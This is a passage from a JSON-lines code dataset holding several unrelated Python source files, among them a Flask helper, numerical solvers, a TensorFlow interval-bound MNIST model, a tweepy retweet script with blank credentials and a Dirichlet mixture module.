HTTPRedirect(\"/admin/login/\")\n \"\"\"\n return redirect(location, code, response)","repo_name":"FlaskAio/navycut","sub_path":"navycut/http/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"18"} +{"seq_id":"13458646005","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 7 17:07:32 2020\n@author: Mingfen Wang\n\"\"\"\n\nimport numpy as np\n\ndef coordinate_descent_method(A, b, guess, N, TOR):\n A_T = A.T\n x = guess.copy()\n k = 1\n while k < N:\n save_x = x.copy()\n for i in range(len(x)):\n b_in_Ax = b - np.dot(A, x)\n foot = np.dot(b_in_Ax, A_T[i]) / np.dot(A_T[i], A_T[i])\n x[i] = x[i] + foot\n diff_x = x - save_x\n if np.dot(diff_x, diff_x) < TOR:\n break\n k = k + 1\n return x, k\n\nA = np.array([[1., -1., 0.],\\\n [-1., 2., 1.],\\\n [0., 1., 5.]])\nb = np.array([3., -3., 4.])\nguess = np.array([0., 0., 0.])\nx, k = coordinate_descent_method(A, b, guess, 300 * len(b), 1e-6)\nprint(\"x = {} in {} iterations.\".format(x.round(2), k))\n","repo_name":"meshonline/coordinate-descent-solver","sub_path":"coorddescent.py","file_name":"coorddescent.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23605968846","text":"\"\"\"Register with a decorator.\"\"\"\nfrom dataclasses import dataclass\n\nfrom hopscotch import injectable\nfrom hopscotch import Registry\n\n\n@injectable()\n@dataclass\nclass Greeter:\n \"\"\"A simple greeter.\"\"\"\n\n greeting: str = \"Hello!\"\n\n\nregistry = Registry()\nregistry.scan()\n# Later\ngreeter = registry.get(Greeter)\n# greeter.greeting == \"Hello!\"\n","repo_name":"pauleveritt/hopscotch","sub_path":"examples/readme/decorator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"24335184805","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom ...models_access import (\n OdooProductAccess, ProductSyncAccess, AmazonProductAccess\n)\nfrom ...model_names.shared_names import (\n MODEL_NAME_FIELD, RECORD_ID_FIELD,\n)\nfrom ...model_names.product_sync import (\n SYNC_TYPE_FIELD,\n SYNC_DELETE, SYNC_CREATE, SYNC_DEACTIVATE,\n)\nfrom ..amazon_names import AMAZON_ID_FIELD, AMAZON_SKU_FIELD\n\n_logger = logging.getLogger(__name__)\n\n\nclass BaseTransformer(object):\n \"\"\"\n This is the base transform\n \"\"\"\n def __init__(self, env):\n self._odoo_product = OdooProductAccess(env)\n self._product_sync = ProductSyncAccess(env)\n self._amazon_product = AmazonProductAccess(env)\n self._product = None\n\n @staticmethod\n def _raise_exception(field_name):\n template = \"Invalid {} value in Sync transformation\"\n raise ValueError(template.format(field_name))\n\n @staticmethod\n def _check_string(sync_value, field_name, field_value):\n # add field to sync value, raise an exception if the value is invalid\n if field_value:\n field_value = field_value.strip()\n if field_value:\n sync_value[field_name] = field_value\n return\n\n # otherwise raise an exception for required field\n BaseTransformer._raise_exception(field_name)\n\n @staticmethod\n def _add_string(sync_value, field_name, field_value):\n # add valid field value to sync value\n if field_value:\n field_value = field_value.strip()\n if field_value:\n sync_value[field_name] = field_value\n\n @staticmethod\n def _remove_syncs(sync_ops, removing_ops):\n for sync_op in removing_ops:\n sync_ops = sync_ops - sync_op\n return sync_ops\n\n def _merge_others(self, sync_op, sync_ops):\n \"\"\"\n This is stub that to be implement in a child class if\n it needs to do other work\n \"\"\"\n pass\n\n # the default implementation, update transform should combine values\n def _check_redundant(self, sync_ops):\n _logger.debug(\"check and remove redundant syncs.\")\n processed = set()\n redundant = []\n for sync_op in sync_ops:\n sync_key = (sync_op[MODEL_NAME_FIELD], sync_op[RECORD_ID_FIELD])\n if sync_key in processed:\n self._product_sync.set_sync_redundant(sync_op)\n redundant.append(sync_op)\n else:\n processed.add(sync_key)\n # a hook method that might be implemented in a subclass\n self._merge_others(sync_op, sync_ops)\n\n _logger.debug(\"Found {} redundant syncs.\".format(len(redundant)))\n return BaseTransformer._remove_syncs(sync_ops, redundant)\n\n def _convert_sync(self, sync_op):\n \"\"\"\n To be called and extended in subclass to convert more fields\n \"\"\"\n sync_value = {AMAZON_ID_FIELD: sync_op.id}\n sku = OdooProductAccess.get_sku(self._product)\n BaseTransformer._check_string(sync_value, AMAZON_SKU_FIELD, sku)\n return sync_value\n\n def _check_stop(self, sync_op):\n stop_sync = False\n self._product = self._odoo_product.get_existed_product(sync_op)\n # for all but delete, we want to make sure the product exists\n # no need to check Amazon Product table because both\n # waiting syncs are checked before switch to new\n if sync_op[SYNC_TYPE_FIELD] != SYNC_DELETE:\n if self._product:\n if self._odoo_product.is_sync_active_product(\n self._product):\n # may be unnecessary but does not hurt\n if sync_op[SYNC_TYPE_FIELD] == SYNC_DEACTIVATE:\n stop_sync = True\n else:\n if sync_op[SYNC_TYPE_FIELD] != SYNC_DEACTIVATE:\n stop_sync = True\n\n else:\n stop_sync = True\n return stop_sync\n\n def _transform_sync(self, sync_op, invalid_ops, sync_values):\n if self._check_stop(sync_op):\n log_template = \"Product not found or sync disabled \" \\\n \"for sync id {0}. Skip it.\"\n _logger.debug(log_template.format(sync_op.id))\n ProductSyncAccess.set_sync_no_product(sync_op)\n invalid_ops.append(sync_op)\n else:\n sync_value = self._convert_sync(sync_op)\n if sync_value:\n sync_values.append(sync_value)\n else:\n log_template = \"Sync id {0} has empty value. Skip it.\"\n _logger.debug(log_template.format(sync_op.id))\n ProductSyncAccess.update_sync_new_empty_value(sync_op)\n invalid_ops.append(sync_op)\n\n def transform(self, sync_ops):\n # we change sync_ops record set because making a copy\n # creates a new record set that is saved in table.\n sync_ops = self._check_redundant(sync_ops)\n\n sync_values = []\n invalid_ops = []\n for sync_op in sync_ops:\n try:\n self._transform_sync(sync_op, invalid_ops, sync_values)\n # some pending write syncs or newly-switched new\n # write syncs are made redundant by delete and create\n if sync_op[SYNC_TYPE_FIELD] in [SYNC_CREATE, SYNC_DELETE]:\n self._product_sync.find_set_redundant(sync_op)\n except Exception as ex:\n log_template = \"Sync transform error for sync id {0} \" \\\n \"Exception: {1}.\"\n _logger.debug(log_template.format(sync_op.id, ex.message))\n\n ProductSyncAccess.update_sync_new_exception(sync_op, ex)\n invalid_ops.append(sync_op)\n\n sync_ops = BaseTransformer._remove_syncs(sync_ops, invalid_ops)\n\n assert(len(sync_ops) == len(sync_values))\n return sync_ops, sync_values\n","repo_name":"amdeb/amdeb-amazon","sub_path":"amdeb_amazon/mws/product_sync_transform/base_transfomer.py","file_name":"base_transfomer.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"7466506917","text":"\"\"\"\nThe model is adapted from the tensorflow tutorial:\nhttps://www.tensorflow.org/get_started/mnist/pros\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\n\nclass Model(object):\n def __init__(self, config, c1_ops, c2_ops, fc_ops):\n filters = config[\"filters\"]\n filter_size = config[\"filter_size\"]\n\n self.x_input = tf.placeholder(tf.float32, shape = [None, 784])\n self.y_input = tf.placeholder(tf.int64, shape = [None])\n self.x_input_natural = tf.placeholder(tf.float32, shape = [None, 784])\n self.x_input_natural_reshaped = tf.reshape(self.x_input_natural, [-1, 28, 28, 1])\n self.x_image = tf.reshape(self.x_input, [-1, 28, 28, 1])\n\n # first convolutional layer\n self.W_conv1 = self._weight_variable([filter_size, filter_size, 1, filters[0]],\n sparsity = config[\"sparse_init\"])\n b_conv1 = self._bias_variable([filters[0]])\n self.h_1 = self._conv2d_2x2_strided(self.x_image, self.W_conv1) + b_conv1\n self.h_conv1 = self.get_anti_relu_layer(self.h_1, c1_ops)\n\n # second convolutional layer\n self.W_conv2 = self._weight_variable([filter_size, filter_size, filters[0], filters[1]],\n sparsity = config[\"sparse_init\"])\n b_conv2 = self._bias_variable([filters[1]])\n self.h_2 = self._conv2d_2x2_strided(self.h_conv1, self.W_conv2) + b_conv2\n self.h_conv2 = self.get_anti_relu_layer(self.h_2, c2_ops)\n\n # first fc layer\n self.W_fc1 = self._weight_variable([7 * 7 * filters[1], filters[2]])\n b_fc1 = self._bias_variable([filters[2]])\n h_conv2_flat = tf.reshape(self.h_conv2, [-1, 7 * 7 * filters[1]])\n self.h_fc_pre_relu = tf.matmul(h_conv2_flat, self.W_fc1) + b_fc1\n self.h_fc1 = self.get_anti_relu_layer(self.h_fc_pre_relu, fc_ops)\n\n # relu lb/ub estimation for layer 0\n self.lb_0 = tf.maximum(self.x_input_natural_reshaped - config[\"eval_epsilon\"], 0)\n self.ub_0 = tf.minimum(self.x_input_natural_reshaped + config[\"eval_epsilon\"], 1)\n\n # relu lb/ub estimation for layer 1\n self.lb_1, self.ub_1 = self._interval_arithmetic_conv_2x2_strided(self.lb_0, self.ub_0, self.W_conv1, b_conv1)\n self.lbh_1, self.ubh_1 = self.get_anti_relu_layer(self.lb_1, c1_ops), self.get_anti_relu_layer(self.ub_1, c1_ops)\n\n # relu lb/ub estimation for layer 2\n self.lb_2, self.ub_2 = self._interval_arithmetic_conv_2x2_strided(self.lbh_1, self.ubh_1, self.W_conv2, b_conv2)\n self.lbh_2, self.ubh_2 = self.get_anti_relu_layer(self.lb_2, c2_ops), self.get_anti_relu_layer(self.ub_2, c2_ops)\n self.lbh_2_flat = tf.reshape(self.lbh_2, [-1, 7 * 7 * filters[1]])\n self.ubh_2_flat = tf.reshape(self.ubh_2, [-1, 7 * 7 * filters[1]])\n\n # relu lb/ub estimation for layer 3\n self.lb_3, self.ub_3 = self._interval_arithmetic(self.lbh_2_flat, self.ubh_2_flat, self.W_fc1, b_fc1)\n\n # unstable relus estimation\n self.unstable1 = self._num_unstable(self.lb_1, self.ub_1, c1_ops)\n self.unstable2 = self._num_unstable(self.lb_2, self.ub_2, c2_ops)\n self.unstable3 = self._num_unstable(self.lb_3, self.ub_3, fc_ops)\n\n # output layer\n self.W_fc_out = self._weight_variable([filters[2],10])\n b_fc_out = self._bias_variable([10])\n self.pre_softmax = tf.matmul(self.h_fc1, self.W_fc_out) + b_fc_out\n y_xent = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=self.y_input, logits=self.pre_softmax)\n\n # xent loss\n self.xent = tf.reduce_mean(y_xent)\n\n # Final prediction\n self.y_pred = tf.argmax(self.pre_softmax, 1)\n correct_prediction = tf.equal(self.y_pred, self.y_input)\n self.num_correct = tf.reduce_sum(tf.cast(correct_prediction, tf.int64))\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n # Assumes shapes of Bxm, Bxm, mxn, n\n def _interval_arithmetic(self, lb, ub, W, b):\n W_max = tf.maximum(W, 0.0)\n W_min = tf.minimum(W, 0.0)\n new_lb = tf.matmul(lb, W_max) + tf.matmul(ub, W_min) + b\n new_ub = tf.matmul(ub, W_max) + tf.matmul(lb, W_min) + b\n return new_lb, new_ub\n\n def _interval_arithmetic_conv_2x2_strided(self, lb, ub, W, b):\n W_max = tf.maximum(W, 0.0)\n W_min = tf.minimum(W, 0.0)\n new_lb = self._conv2d_2x2_strided(lb, W_max) + self._conv2d_2x2_strided(ub, W_min) + b\n new_ub = self._conv2d_2x2_strided(ub, W_max) + self._conv2d_2x2_strided(lb, W_min) + b\n return new_lb, new_ub\n\n @staticmethod\n def _weight_variable(shape, sparsity=-1.0):\n initial = tf.truncated_normal(shape, stddev=0.1)\n if sparsity > 0:\n mask = tf.cast(tf.random_uniform(shape) < sparsity, tf.float32)\n initial *= mask\n return tf.Variable(initial)\n\n @staticmethod\n def _bias_variable(shape):\n initial = tf.constant(0.1, shape = shape)\n return tf.Variable(initial)\n\n @staticmethod\n def _conv2d_2x2_strided(x, W):\n return tf.nn.conv2d(x, W, strides=[1,2,2,1], padding='SAME')\n\n \"\"\"Count number of unstable ReLUs\"\"\"\n @staticmethod\n def _num_unstable(lb, ub, ops=None):\n is_unstable = tf.cast(lb * ub < 0.0, tf.int32)\n if ops is not None:\n is_relu = (ops == 0)\n is_unstable_relu = is_relu * is_unstable\n else:\n is_unstable_relu = is_unstable\n all_but_first_dim = np.arange(len(is_unstable_relu.shape))[1:]\n result = tf.reduce_sum(is_unstable_relu, all_but_first_dim)\n return result\n\n def get_anti_relu_layer(self, activations, ops):\n assert (activations.shape[1:] == ops.shape)\n \n # Hacky solution because tensorflow is hard\n shape = activations.shape.as_list()\n shape[0] = -1\n num_elements = np.prod(shape[1:])\n flat_shape = [-1, num_elements]\n flat_activations = tf.reshape(activations, flat_shape)\n flat_ops = ops.flatten()\n flat_output = [0 for i in range(num_elements)]\n\n for i in range(num_elements):\n op = flat_ops[i]\n if op == -1:\n flat_output[i] = 0 * flat_activations[:,i]\n elif op == 1:\n flat_output[i] = flat_activations[:,i]\n elif op == 0:\n flat_output[i] = tf.nn.relu(flat_activations[:,i])\n else:\n raise ValueError(\"Ops should be -1, 1, or 0, but it is not\")\n\n # Transpose is necessary for batch size > 1\n output = tf.reshape(tf.transpose(flat_output), shape)\n return output\n","repo_name":"MadryLab/relu_stable","sub_path":"models/MNIST_naive_ia_masked.py","file_name":"MNIST_naive_ia_masked.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"18"} +{"seq_id":"11391779053","text":"from dataclasses import dataclass, field\nfrom queue import PriorityQueue\nfrom typing import Any\n\nfile = open('in.txt', 'r')\nlines = [line.strip() for line in file.readlines()]\n\nheight = len(lines)\nwidth = len(lines[0])\n\nheight_map = [-1 for _ in range(height * width)]\nend = None\n\n\ndef to_norm_coord(x, y):\n return y * width + x\n\n\n# init height map\nfor y in range(height):\n for x in range(width):\n char = lines[y][x]\n norm_coord = to_norm_coord(x, y)\n if char == 'S':\n height_map[norm_coord] = 0\n elif char == 'E':\n end = norm_coord\n height_map[norm_coord] = 25\n else:\n height_map[norm_coord] = ord(char) - 97\n\n# create adjacency list\nadj_list = [[] for _ in range(height * width)]\nfor y in range(height):\n for x in range(width):\n norm_coord = to_norm_coord(x, y)\n neighbors = [(x, y + 1), (x + 1, y), (x, y - 1), (x - 1, y)]\n neighbors = [to_norm_coord(x, y) for x, y in neighbors if 0 <= x < width and 0 <= y < height]\n for neighbor in neighbors:\n if height_map[neighbor] <= height_map[norm_coord] + 1:\n adj_list[norm_coord].append(neighbor)\n\n# init start vertices\nstart_vertices = [idx for idx in range(width * height) if height_map[idx] == 0]\n\n# calc min dist to end for every start vertex and save lowest of all\nmin_end_dist = float('inf')\n\n\n@dataclass(order=True)\nclass PrioritizedItem:\n priority: int\n item: Any = field(compare=False)\n\n\nfor start in start_vertices:\n # dijkstra\n dist = [float('inf') for _ in range(height * width)]\n dist[start] = 0\n queue = PriorityQueue()\n queue.put(PrioritizedItem(dist[start], start))\n\n while not queue.empty():\n item = queue.get()\n cur_dist = item.priority\n vertex = item.item\n if cur_dist > dist[vertex]:\n continue\n for neighbor in adj_list[vertex]:\n if cur_dist + 1 < dist[neighbor]:\n dist[neighbor] = cur_dist + 1\n queue.put(PrioritizedItem(cur_dist + 1, neighbor))\n min_end_dist = min(min_end_dist, dist[end])\n\nprint(min_end_dist)\n","repo_name":"ncryptedV1/AoC22","sub_path":"day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15782494061","text":"import gevent\nimport json\n\nfrom flask import request, render_template, abort\n\nfrom slacklog import app, messages, redis_store, sockets, backend\nfrom slacklog.models import Message\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", messages=messages)\n\n@app.route(\"/input\", methods=[\"POST\"])\ndef input_slack_message():\n msg = Message(timestamp=request.form['timestamp'],\n service_id=request.form['service_id'],\n channel_id=request.form['channel_id'],\n team_domain=request.form['team_domain'],\n text=request.form['text'],\n token=request.form['token'],\n user_name=request.form['user_name'],\n team_id=request.form['team_id'],\n user_id=request.form['user_id'],\n channel_name=request.form['channel_name'])\n if msg.token == app.config['SLACK_INPUT_TOKEN']:\n msg.process()\n messages.append(msg)\n redis_store.publish(app.config['REDIS_CHAN'], json.dumps(msg.__dict__))\n return \"ok\"\n else:\n abort(403)\n\n@sockets.route('/ws')\ndef ws_endpoint(ws):\n backend.register(ws)\n\n while not ws.closed:\n gevent.sleep(1)","repo_name":"hreeder/slacklog","sub_path":"slacklog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14206659610","text":"import sys\nsys.stdin = open('input.txt')\n\nnum = int(input())\nN = int(input())\narr = [[0] * (num+1) for _ in range(num+1)]\n\nfor _ in range(N):\n i, j = map(int, input().split())\n arr[i][j] = arr[j][i] = 1\n\nworm = [1]\nchecked = [1]\n\nwhile worm:\n i = worm.pop()\n\n for j in range(1, num + 1):\n if arr[i][j] == 1 and (j not in checked):\n worm.append(j)\n checked.append(j)\n\nprint(len(checked)-1)\n\n\n\n\n\n","repo_name":"yujeong23/algorithm","sub_path":"백준/silver/2606_바이러스/2606_바이러스.py","file_name":"2606_바이러스.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40985321783","text":"from string import split, join, strip\nimport sys, os, copy\nfrom transcendental import gamma, log, array, product, beta, lgamma, exp, zeros\nfrom Bio.Align.AlignInfo import PSSM\nfrom cStringIO import StringIO\n\n# Background amino acid frequencies - as dictionary\n## BKGRND_PROBS = {'A': 7.5610, 'C': 1.6504, 'D': 5.0605,\n## 'E': 6.1824, 'F': 4.0928, 'G': 6.9696,\n## 'H': 2.2818, 'I': 5.7749, 'K': 5.6397,\n## 'L': 9.5874, 'M': 2.3668, 'N': 4.3354,\n## 'P': 5.0832, 'Q': 3.9400, 'R': 5.3245,\n## 'S': 7.3014, 'T': 5.7451, 'V': 6.5107,\n## 'W': 1.3716, 'Y': 3.1464}\n\nBKGRND_PROBS = {'A': 0.075666295724018673, 'C': 0.016516288118360062,\n 'E': 0.061870031303289649, 'D': 0.050642678152545494,\n 'G': 0.069747892431969383, 'F': 0.040958473103989368,\n 'I': 0.05779199724595098, 'H': 0.022834989231988598,\n 'K': 0.056438990609013105, 'M': 0.023685622102844514,\n 'L': 0.095945383365223735, 'N': 0.043386279391867545,\n 'Q': 0.039429335425556614, 'P': 0.050869847166291719,\n 'S': 0.073068362861969299, 'R': 0.053284643774968568,\n 'T': 0.057493775368874442, 'W': 0.013726212301952652,\n 'V': 0.065155475673901384, 'Y': 0.031487426645424192}\n\ndef _print_vector(v, indent=0, floats_per_row=10, fp=sys.stdout,\n indent_first_row=True):\n if indent_first_row: indent1 = indent\n else: indent1 = 0\n fp.write(\"%*s[\" % (indent1, \"\"))\n k = range(len(v))\n for i in range(0, len(v), floats_per_row):\n for j in k[i: i+floats_per_row]:\n fp.write(\"%.7f, \" % v[j])\n fp.write(\"\\n%*s\" % (indent+1, \"\"))\n fp.write(\"]\")\n\ndef freq_counts(seqs, alphabet, weights=None):\n if weights == None: weights = [1.0]*len(seqs)\n counts = [[0.0 for a in alphabet] for s in seqs[0]]\n order = {}\n for i, a in enumerate(alphabet):\n order[a] = i\n\n for i in range(len(seqs[0])):\n for j in range(len(seqs)):\n a = order[seqs[j][i]]\n counts[i][a] += weights[j]\n return counts\n\ndef henikoff_weights(seqs, alphabet, counts):\n order = {}\n for i, a in enumerate(alphabet):\n order[a] = i\n weights = [0.0]*len(seqs)\n w_sum = 0.0\n for i in range(len(counts)):\n r = 0\n for j in range(len(counts[i])):\n if counts[i][j] > 0.0: r += 1\n for k in range(len(seqs)):\n w = 1 / (r * counts[i][order[seqs[k][i]]])\n weights[k] += w\n w_sum += w\n c = len(seqs) / w_sum\n return [w*c for w in weights]\n\n\ndef log_beta(x):\n return sum(lgamma(x)) - lgamma(sum(x))\n\nclass DirichletMix:\n def __init__(self, dic=None):\n if dic == None:\n self.mixture = []\n self.alpha = []\n self.order = {}\n else:\n self.__dict__.update(dic)\n self.order = {}\n for i, a in enumerate(self.alphabet):\n self.order[a] = i\n self.num_distr = len(self.mixture)\n \n def read(self, filename):\n fp = file(filename, 'r')\n actions = {'Name': \"self.name = atoms[2]\",\n 'Name=': \"self.name = atoms[1]\",\n 'Order': \"self.alphabet = join(atoms[2:],'')\",\n 'Order=': \"self.alphabet = join(atoms[1:],'')\",\n 'Mixture=': \"self.mixture.append(float(atoms[1]))\",\n 'Alpha=': \"self.alpha.append(map(float, atoms[1:]))\",\n }\n\n for line in fp:\n atoms = split(strip(line))\n if not len(atoms): continue\n if atoms[0] == 'EndClassName': break\n if atoms[0] not in actions: continue\n else:\n exec(actions[atoms[0]])\n fp.close()\n for i, a in enumerate(self.alphabet):\n self.order[a] = i\n self.num_distr = len(self.mixture)\n\n def _print_as_PyDict(self, indent=0, floats_per_row=10, fp=sys.stdout,\n indent_first_row=True):\n if indent_first_row: indent1 = indent\n else: indent1 = 0\n fp.write(\"%*s{'name': '%s',\\n\" % (indent1, \"\", self.name))\n fp.write(\"%*s 'alphabet': '%s',\\n\" % (indent, \"\", self.alphabet))\n fp.write(\"%*s 'mixture': \" % (indent, \"\"))\n _print_vector(self.mixture, indent+12, floats_per_row, fp, False)\n fp.write(\",\\n\")\n fp.write(\"%*s 'alpha': [\" % (indent, \"\"))\n _print_vector(self.alpha[0], indent+11, floats_per_row, fp, False)\n fp.write(\",\\n\")\n for i in range(1,len(self.alpha)):\n _print_vector(self.alpha[i], indent+11, floats_per_row, fp, True)\n fp.write(\",\\n\")\n fp.write(\"%*s ]}\" % (indent, \"\"))\n\n # TO DO: FIX THE NOTATION SO THAT IT CORRESPONDS TO THE PAPER\n\n def _coeffs(self, k, n, sum_n):\n alpha = array(self.alpha[k][1:])\n sum_alpha = self.alpha[k][0]\n q = self.mixture[k]\n\n # Calculate the coefficient using logarithms\n log_coeff = log_beta(n+alpha) - log_beta(alpha)\n return q * exp(log_coeff)\n \n## P = 1.0\n## for i in range(len(alpha)):\n## if n[i]:\n## P *= n[i] * beta(n[i], alpha[i])\n## print n[i], alpha[i], beta(n[i], alpha[i])\n## print P\n## B = sum_n * beta(sum_n, sum_alpha)\n## return q * B / P\n\n def _probs(self, i, coeff, n):\n a = array([self.alpha[k][i+1] for k in xrange(self.num_distr)])\n sum_a_j = array([sum(self.alpha[k][1:]) for k in xrange(self.num_distr)])\n return sum(coeff*(a+n[i])/(sum_a_j + sum(n)))\n\n def aa_vector(self, aa_dict):\n return [aa_dict[a] for a in self.alphabet]\n\n def block_counts(self, seqs, weights=None):\n return freq_counts(seqs, self.alphabet, weights)\n\n \n def _pos_probs(self, counts):\n n = array(counts)\n\n # *** NEW CODE FROM HERE ****\n sum_n = sum(n)\n p = array([0.0]*len(counts))\n log_coeffs = array([0.0]*self.num_distr)\n q = array(self.mixture)\n\n for j in xrange(self.num_distr):\n alpha_j = array(self.alpha[j][1:])\n log_coeffs[j] = log_beta(n+alpha_j) - log_beta(alpha_j)\n \n log_coeffs = log_coeffs - max(log_coeffs)\n coeffs = q * exp(log_coeffs)\n\n for i in xrange(len(counts)):\n a = array([self.alpha[j][i+1] for j in xrange(self.num_distr)])\n sum_a_j = array([sum(self.alpha[j][1:]) for j in xrange(self.num_distr)])\n N = (a+n[i])/(sum_a_j + sum(n))\n p[i] = sum(coeffs*N)\n\n return p / sum(p) \n # **** END OF NEW CODE **** \n\n## coeff = array([self._coeffs(k, n, sum(n)) for k in range(self.num_distr)])\n## # coeff = coeff / sum(coeff)\n## X = array([self._probs(i, coeff, n) for i in xrange(len(counts))])\n## return X / sum(X)\n\n def _pos_log_odds(self, _pos_probs, bkgrnd, scale=1.0):\n n = len(_pos_probs)\n return [int(scale * log(_pos_probs[i]/bkgrnd[i]) / log(2.0)) for i in range(n)]\n\n def block_probs(self, block_counts):\n return [self._pos_probs(counts) for counts in block_counts]\n\n def block_log_odds(self, block_probs, bkgrnd, scale=1.0):\n return [self._pos_log_odds(probs, bkgrnd, scale) for probs in block_probs]\n \n def block2pssm(self, block_data, seq):\n pssm_info = []\n for i in range(len(block_data)):\n score_dict = {}\n for a in self.alphabet:\n score_dict[a] = block_data[i][self.order[a]]\n pssm_info.append((seq[i], score_dict))\n return PSSM(pssm_info)\n\n def print_block_data(self, block_data, field_width=4, precision=4, dtype='int'):\n file_str = StringIO()\n if dtype == 'int':\n pdata = lambda x: \"%*d \" % (field_width, x)\n else:\n pdata = lambda x: \"%*.*f \" % (field_width, precision, x)\n \n file_str.write(\" \")\n for i in range(len(block_data)):\n file_str.write(\"%*d \" % (field_width, i))\n file_str.write(\"\\n\")\n for j, a in enumerate(self.alphabet):\n file_str.write(\" %c \" % a)\n for i in range(len(block_data)):\n file_str.write(pdata(block_data[i][j]))\n file_str.write(\"\\n\")\n return file_str.getvalue()\n \ndef _Comp2PyScript(path, filename=None):\n \"\"\"\n Converts all Dirichlet mixtures files (ending in comp)\n in the path to Python dictionaries and stores them\n in filename if provided (otherwise prints to stdout).\n \"\"\"\n\n if filename == None:\n fp = sys.stdout\n else:\n fp = file(filename, 'w')\n\n names = os.listdir(path)\n ffunc = lambda s: s[-4:] == 'comp'\n names = filter(ffunc ,names)\n names.sort()\n\n fp.write(\"import DirichletMix\\n\\n\")\n fp.write(\"get_mix = lambda name: DirichletMix.DirichletMix(DIR_MIX[name])\\n\") \n fp.write(\"get_names = lambda : NAMES\\n\\n\")\n\n k = range(len(names))\n fp.write(\"NAMES = [\")\n for i in range(0, len(k), 3):\n for j in k[i: i+3]:\n fp.write(\"'%s', \" % names[j])\n fp.write(\"\\n%*s\" % (9+1, \"\"))\n fp.write(\"]\\n\\n\")\n \n fp.write(\"DIR_MIX = {\\n\")\n fp.write(\" '%s': \" % names[0])\n DM = DirichletMix()\n DM.read(names[0])\n DM._print_as_PyDict(4+len(names[0])+4, 4, fp, False)\n fp.write(\",\\n\")\n \n for s in names[1:]:\n fp.write(\"%*s'%s': \" % (4, \"\", s))\n DM = DirichletMix()\n DM.read(s)\n DM._print_as_PyDict(4+len(s)+4, 4, fp, False) \n fp.write(\",\\n\")\n fp.write(\" }\\n\")\n \n if filename != None:\n fp.close()\n\n","repo_name":"samesense/bio_tools","sub_path":"DirichletMix.py","file_name":"DirichletMix.py","file_ext":"py","file_size_in_byte":9779,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"24861868143","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 2 09:02:25 2021\n\n@author: ritu\n\"\"\"\n\n\nimport tweepy\nimport pandas as pd\n\n \n# assign the values accordingly\n#consumer_key = \"\"\n#consumer_secret = \"\"\n#access_token = \"\"\n#access_token_secret = \"\"\n\nconsumer_key = \"\"\nconsumer_secret = \"\"\naccess_token = \"\"\naccess_token_secret = \"\"\n \n# authorization of consumer key and consumer secret\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n \n# set access to user's access key and access secret \nauth.set_access_token(access_token, access_token_secret)\n \n# calling the api \napi = tweepy.API(auth, wait_on_rate_limit=True)\n \n# the ID of the tweet\nID = 1265889240300257280\n#ID = 1272479136133627905\n\nID = 1455236401071484929\n# \n# getting the retweeters\nretweets_list = api.retweets(ID)\nstatus= api.get_status(ID)\n#file= 'sample status.txt'\nfile = open(\"sample status.txt\", \"w\")\nfile.write(str(status))\n#print(status)\n#print(retweets_list)\n# printing the screen names of the retweeters\nfor retweet in retweets_list:\n print(retweet.user.screen_name)\n","repo_name":"saurabhburewar/Data-and-Networks_Hashtag-analysis","sub_path":"Twitter files/retweeter.py","file_name":"retweeter.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28331276643","text":"#!/usr/bin/python\n\nimport csv\nfrom ingredients import *\n\n\n# class Recipe:\n# '''recipes available in the cookbooks'''\n# def __init__(self, name, resource, carrots, onions, celeries, \\\n# peppers, garlics, ):\n# self.name = name\n# self.ingredients = OrderedDict([(carrot,carrots), \\\n# (onion,onions), (celery,celeries), (pepper,peppers), \\\n# (garlic,garlics), )])\n# \n# def __hash__(self):\n# return hash(self.name)\n# \n# def __str__(self):\n# return 'Supply(\"%s\", %d, %d, %d, %d, %d, %d)' % (self.name, self.ingredients[carrot], self.ingredients[onion], self.ingredients[celery], self.ingredients[pepper], self.ingredients[garlic], self.ingredients[herbs])\n# \n# def publish(self):\n# '''prints name of Supply and how many of each item'''\n# print(self.name)\n# for (k,v) in self.ingredients.items():\n# print(k.name,v,sep='\\t')\n# \n# def display(self):\n# '''prepares string of market status'''\n# status = str()\n# for (k,v) in self.ingredients.items():\n# status+=k.name+': '+str(v)+' '\n# return(status)\n# \n# def quantity(self):\n# '''finds how many Ingredients are in Supply'''\n# return( sum([v for v in self.ingredients.values()]) )\n\n\n\nfilename = 'recipes.csv'\n\ncookbooks = [list() for n in range(3)]\n\nwith open(filename, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter = ',')\n next(reader) # to skip the header row\n for row in reader:\n cookbooks[int(row[-1])-1].append(row)\n# 